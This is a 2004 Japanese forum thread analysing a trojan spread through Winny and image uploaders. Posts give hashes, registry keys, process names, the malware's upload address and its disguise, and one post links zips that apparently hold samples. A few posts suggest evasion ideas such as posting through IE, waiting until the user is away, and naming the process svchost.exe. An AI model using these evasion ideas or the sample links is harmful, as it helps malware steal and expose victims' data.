今まで何をやってどこで躓いているのかくらいは書かないと 重いからというより、アホだから？ 921 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:25:35 ID:mmGHQUsE] >>916 ならいいけどね 922 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:25:41 ID:mgVunU57] >>918は閉鎖の件ですた。 俺はダメだったけど、一応早めにスレ立てしといた方が良いんじゃない？ というわけで↓よろ。 923 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:26:45 ID:r7vcxVQ0] さっきのものです。 セーフモードで２つのファイルを消去しました。 下の2つの意味がわからなかったのですが・・・ 924 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:27:25 ID:wZ9Gu9IX] ↑ 次はｽﾚたてね 925 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:33:34 ID:C3nZ381I] >>920 基礎知識が無さ過ぎて説明出来ないだけだろ。 こんなアホにいちいち説明してたらスレ一つ使い切っても足りんよ。 926 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:44:19 ID:g0/m5KiY] 亜種が出ているスレ。 スレストまでされてます。 今週のジャンプがうｐされているんだが… news13.2ch.net/test/read.cgi/news/1095933187/ 927 名前：627 mailto:sage [04/09/23 20:48:35 ID:Q+leSqll] >>876 とりあえずノートン先生には提出完了 928 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:48:35 ID:Ze0M08FR] config.txt ....exeの分を更新したと思ったらまた亜種か・・・orz 929 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:51:03 ID:LvJ+JBBu] >>926 他のスレでも調子に乗ったバカが亜種をうｐしてるのを見たぞ バカだなぁこいつら、捕まるともしらんでｗ 930 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:54:00 ID:RzyOzwfF] キンタマ亜種 今週のジャンプがうｐされているんだが… news13.2ch.net/test/read.cgi/news/1095933187/ 931 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:55:00 ID:adI/sxzM] もう収拾つかんね。京○府○の仕事が山盛りだな。 932 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:55:50 ID:wZ9Gu9IX] 頑張ってくれよK察 933 名前：[名無し]さん(bin+cue).rar [04/09/23 20:56:15 ID:h0nUPIzO] 亜種ってどれくらいいるんだろう 934 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:56:19 ID:Ze0M08FR] ファイルサイズもファイル名もオリジナルと同じだなあ。ほんとに亜種か？ 友達にノートン先生がいるひと、よろしく。 935 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:56:46 ID:CeMeBwCa] >>934 CRC比較きぼん 936 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:57:36 ID:ONxIjWCf] >>926 これは最初のﾔﾂでしょ 中身はロリ写真集だし、ノートンパッチで反応あり削除されました 937 名前：[名無し]さん(bin+cue).rar [04/09/23 20:59:30 ID:h0nUPIzO] 次スレ、↓の人よろ 938 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:00:23 ID:kBaEXo4M] 次スレ建てました。 苺きんたまは流行種１にまとめサイトurl貼りだけ。 必要なら流行種ﾊﾟﾀｰﾝ作ってください。 あと使い終わってから移動よろ。 【警報】Winnyを狙ったワーム・ウイルス情報 Part27 tmp4.2ch.net/test/read.cgi/download/1095939735/ 939 名前：[名無し]さん(bin+cue).rar [04/09/23 21:01:49 ID:h0nUPIzO] >>938 乙 類似品を大量に作れるのならうｐロだ自体を削除しないととまらないかもしれんね 940 名前：627 mailto:sage [04/09/23 21:03:22 ID:Q+leSqll] >>934 >>930 1のやつはTrojan.Upchan。 CRCも同じ。 941 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:04:41 ID:Ze0M08FR] >940 あい。了解。 942 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:05:49 ID:h0nUPIzO] >>929 ２ｃｈ史上最多の逮捕者数になるかも試練ね 943 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:06:57 ID:adI/sxzM] もー京○府○は何やってんだよ！　こういう時こそ役に立てや！ Ｋ札権力であぷろだ止めろよ！ 自動ポルノや違法コピーだらけで逮捕せにゃならん奴がまだまだ増えるぞ！ 944 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:07:23 ID:dlC1dSfw] サイズも更新日時をそのまま。苺のやつうｐっただけ 945 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:10:16 ID:OB9dwy0R] 実はこのウィルスは京○府警の罠 946 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:12:03 ID:cDvdfQLH] 教徒不敬のｼﾞｻｸｼﾞｴｰﾝ 947 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:12:32 ID:WWPl3lDC] っていうか、PC名とユーザー名が違うのに晒された画像が同じのがあるんだけど、何で？ もしかして予め画像は用意されてるとか？ 948 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:13:11 ID:aNtJ/kjz] 消防士が放火するって事件が時々あるよね。 949 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:13:51 ID:62NRg8JO] >>938　お疲れちゃん　 >>947 ダブリもでるらしいよ　知らん人と 950 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:16:45 ID:WWPl3lDC] >>938 おつかれ >>949 じゃあ晒された画像はそのどっちかのデスクトップだけってこと？ しかしまぁ苺キンタマのページまとめあげた人は仕事早いなぁ・・ 951 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:20:34 ID:62NRg8JO] >>950 流れが速すぎて状況確認できんのよ　すまんこ 　　　　時間差みたいなことをいってる人がいたみたいだが… 952 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:21:52 ID:b+is4Zm9] これで京都父兄がまったく動かなかったら父兄が第一容疑者 953 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:25:46 ID:WWPl3lDC] >>951 いやいや、わざわざスマン。ありがとう。 悪趣味とは思うがヲチ面白いなぁｗ 慌ててウィルススキャンしてるの見てると面白すぎるｗ 954 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:28:10 ID:sOLz9K12] >>950 自分がアップしたファイル名がわからないので、完了後に一番上にある画像のリンクが使われるらしく、 複数同時にアップされたような場合、同じファイルを指してしまうことがあるらしい。 ファイル自体は、アプロダに個々に存在してるので、リンクだけが同じになってしまっている。 955 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:30:17 ID:xduUn+v/] 新種というか>>867の詳細 原種/亜種ともに 　Software\Borland\Locales 　Software\Borland\Delphi\Locales 　Software\Meropa が存在。DelphiとMeropa使いの犯行 　Software\Microsoft\Microsotf このオチャメな行はなんだろう↑？ Maropa2chなる文字列もあるが、ユーザーエージェントか？ これを弾けばBBS投下はとまるかも 今度はBBS投下文字列を少しいじって 【コンピュータ名】【ユーザー名】【今こんな事やってます】になってる メール欄には「私は升ツールを使用しようとして　罠にかかりました」と表示 ターゲット板が、ネットゲーム、ネトゲサロン、ち〜と、雑談系２、厨房！に変更 感染プロセス名は sugoimonoss.com SS投下先は ttp://up.isp.2ch.net/upload/c=03okari/index.cgi で同じ わざわざ、閲覧しやすいように ttp://v.isp.2ch.net/ に変えて投下SSを案内 コンパイル時の差異によるバイナリ差があるので、オリジナルに第三者が手を加えた ものではなく、オリジナル開発者による、パラメータ変更の第二段と考えるべきだろう。 以上、おわり 956 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:30:37 ID:adI/sxzM] 壁紙やアイコンが見えない状態のSSは成りすましが可能なので注意だな 957 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:31:26 ID:y1QaqjMm] 俺は実行したくないけどFW超える物なのか? EXE単位で許可するFWなんだがこいつをスルーするのか? 958 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:33:27 ID:cDvdfQLH] >>957 スルーする訳ない、安心汁 959 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:35:20 ID:fWYTZuQ9] >>957 ホワイトリストで許可を出してるFWなら大丈夫だろう。 何を使って、どんな設定にしてるのかわからんけど。 960 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:35:37 ID:62NRg8JO] >>954　ありがとうさん >>955 解析おつかれさん 961 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:36:55 ID:xduUn+v/] f/wに関しては、ポート指定物は無力 アプリレベルで止めるものでも、そのうち、ありがちなアプリ名に偽装 した亜種が出てきたら、見分けつかない。 プロセス名は簡単に変えれるっぽい。 962 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:44:00 ID:adI/sxzM] あとProxomitronとか狙い撃ちされたらFW効かなくない？ 963 名前：[名無し]さん(bin+cue).rar [04/09/23 21:46:54 ID:o03myoTB] 今んとこ２種類だけか？ ・苺キンタマ（オリジナル） 〔ファイルサイズ〕677,376 Bytes 〔CRC16〕56B9 〔CRC32〕FC57D234 〔MD5〕 b7921479f8a9079c59c20ef5964338e4 ・苺キンタマ（亜種） 〔ファイルサイズ〕677,376 Bytes 〔CRC16〕775A 〔CRC32〕022A1F64 〔MD5〕 5f323255060be4ddf715fa8fa88f883a 964 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:47:24 ID:rREsfmrT] >>864の〜ol25.zipをダウンロードして解凍してみたらconfig.txtだけ解凍に失敗した なんでだろう 965 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:47:36 ID:cDvdfQLH] その内作者がShareにウィルスのソース流しそうな予感 966 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:48:53 ID:h0nUPIzO] >>965 ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ 967 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:06 ID:h0nUPIzO] つか、これって知り合いが感染しても自分のデータが流出する可能性があるんだよな？ 968 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:47 ID:3I9wKrJu] >>964 readmeに書かれているが関係してるのかな？ 解凍するだけでエクスプローラが落ちた＿|￣|○ 969 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:50 ID:xduUn+v/] >>963 >>864の config.txt（今のとこ苺キンタマ亜種）で、 漏れのとこに保護してあるのは 〔ファイルサイズ〕699,392 Bytes 〔CRC32〕2A8BEBAA なんだが……？ 970 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:52:08 ID:OVqRCEPB] >>967 嫌がらせでやる奴いるかもな・・ 971 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:56:22 ID:r3qqNy/W] これってファイルをダブルクリックしなければ大丈夫なんでしょうか？ 972 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:57:24 ID:h0nUPIzO] >>971 亜種も出てきてるしその考え方はよくない 973 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:57:29 ID:cDvdfQLH] うん 974 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:30 ID:h0nUPIzO] 亜種情報 インターネット上で確認されたファイル名は[1095925509796_AreTool25.zip]、解凍後にラグナロクオンライン関係のツールを装っています。 実行ファイルは[config.txt]でファイルサイズは683KB。.txtの後ろに大量の空白があり、MS-DOSファイル名はCONFIG~1.EXEとなっています。 Windows95で実行してみましたが、ファイルの作成、レジストリの追加に関しては[shellsystem.exe]を[sugoimonoss.com]に変えただけのものと思われます。 975 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:49 ID:cDvdfQLH] Delphi程度の言語でしかウィルスを書けない作者が、Windowsのセキュリティホールを利用した ウィルスを開発するなんてまず無理なんで、とりあえずクリッコしなけりゃだいじょーぶさー 976 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:49 ID:y1QaqjMm] 俺ならIEを起動してうｐろだに書き込むようなプログラムにする 2chに無理に書く必要は無い IEに許可与えてない奴は居ないだろうしな ウイルス感染がばれ易くなるから、マウス、キーボード操作がある一定時間無い時をAFKだと認識してUP SSは定期的に溜め込んで置く 977 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:53 ID:r3qqNy/W] >>971 そうですね・・・。うかつにアップローダのファイルも開けない状態になってしまった・・・。 978 名前：963 [04/09/23 22:00:13 ID:o03myoTB] >>969 漏れが書いてる亜種は>>864のアプロダと同じとこにうｐしてあった ttp://picopico.dip.jp/ragnarok/data/1/1095920291421_wana.zip これ↑のなかの「AretoolTest25〜.exe」ってやつ バイナリのなか見たら亜種クサかったんで ちなみにこいつ↓を落としたんだが、964氏と同じでconfigが解凍できなかった ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip 979 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:00:24 ID:cDvdfQLH] svchost.exeとかにするな俺なら 980 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:00:35 ID:wowdpe/L] >>964 漏れも。解凍はしてないけど、解凍ソフトのメニューで右クリックをしようとしたらメニューが表示できないとか言われてびびった。 一応感染してないかどうか調べようとして、ファイル検索では見つからなかったがレジストリエディタでsugoimonoss.comがヒット(；´Д｀) びっくりしてよく見て見たらWindowsの検索履歴だった罠・・・驚かせるなよ＿|￣|○ 981 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:05:12 ID:Q+leSqll] >>969 ・苺キンタマ（オリジナル） 〔ファイルサイズ〕677,376 Bytes 〔CRC32〕FC57D234 〔MD5〕B7921479F8A9079C59C20EF5964338E4 〔SHA1〕722BB2E6D12167F005E1935B2D3E01229DD30CC5 ・苺キンタマ（亜種） 〔ファイルサイズ〕699,392 Bytes 〔CRC32〕2A8BEBAA 〔MD5〕3EC55FBC1036ECF95F5EC15DFBD94DD1 〔SHA1〕3FA0EC2C7062367E7C0ABD0FE43884504906FD11 こんなのか。 982 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:08:13 ID:7p6CJmmF] >>969 漏れはWinRARで解凍したら「パスとファイル名の長さの合計は 260 文字を超えることはできません」と出たから、Cドライブﾞ直下で解凍したら、解凍できたが、これと一緒ではないか？ 983 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:08:55 ID:h0nUPIzO] tp://idol.bbspink.com/test/read.cgi/ascii2d/1095933366/380 このウィルスらしきものは既出？ 恐ろしくて直リンできやしない 984 名前：982 mailto:sage [04/09/23 22:09:10 ID:7p6CJmmF] 誤爆ｽﾏｿ。>>969ではなく>>978 985 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:09:33 ID:xduUn+v/] 作成日付も入れとこう オリジナル 04/09/22 15:57 亜種 04/09/23 14:52 昨夜の騒ぎを楽しんだ後、変えてやがる 986 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:10:05 ID:h0nUPIzO] 愉快犯かよ 987 名前：[名無し]さん(bin+cue).rar [04/09/23 22:10:10 ID:qRMK2VgF] だれか、もう一回ノートン先生用の定義パッチアップしてよぉ〜。 タスクマネージャーで見るとshellsystem.exeが二匹も いるんだよぉ〜。くぞぉ〜 988 名前：964 mailto:sage [04/09/23 22:10:44 ID:rREsfmrT] 同じ奴が多いな >>982のやり方で無事に解凍できたぞ 989 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:24 ID:mgVunU57] >>987 (・∀・)ｺﾝﾆﾁﾊ!! 990 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:29 ID:1QD87Wms] 馬鹿ばっかだなこのスレ 991 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:41 ID:fWYTZuQ9] つまり関連スレを巡回してるってことか。 いくつかアイディア出してたやつがいるけど、それが取り込まれた亜種 が流れてくる日も近いなこりゃ。(´･ω･`) 992 名前：964 mailto:sage [04/09/23 22:12:48 ID:rREsfmrT] >>988 できたぞってなんか命令みたいだな＿|￣|○ 訂正する 同じ奴が多いな >>982のやり方の通りにやったら無事に解凍できた configだけ解凍できない奴は>>982の通りで出来ると思う 993 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:13:00 ID:h0nUPIzO] 誰かが言っててたな製作者がwinnyとかにウィルスソースを流したらどうなるだろうって 994 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:03 ID:Gd3swaZK] 最初のウィルス以前にうｐされたファイルはとりあえず安心か？ 995 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:05 ID:AH6SroMo] >>993 nyやってるだけの奴にマシな技術の持ち主などいない 996 名前：963 [04/09/23 22:14:37 ID:o03myoTB] >>982 解凍できたよ トンクス 997 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:56 ID:xduUn+v/] これのオリジナルは、トロイ開発キットの様相を呈していたから 亜種は簡単に作れるんだろーな。まだ発現させてない機能もある ようだし。 で、1000取りよろ 998 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:15:01 ID:cDvdfQLH] ソース流されたらちょっとパス変えるだけで定義ファイルを回避する事も可能 999 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:15:47 ID:A3XC4jaX] 1000! 1000 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:16:06 ID:JKMNRGue] 1000 1001 名前：１００１ [Over 1000 Thread] このスレッドは１０００を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。

---

---

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef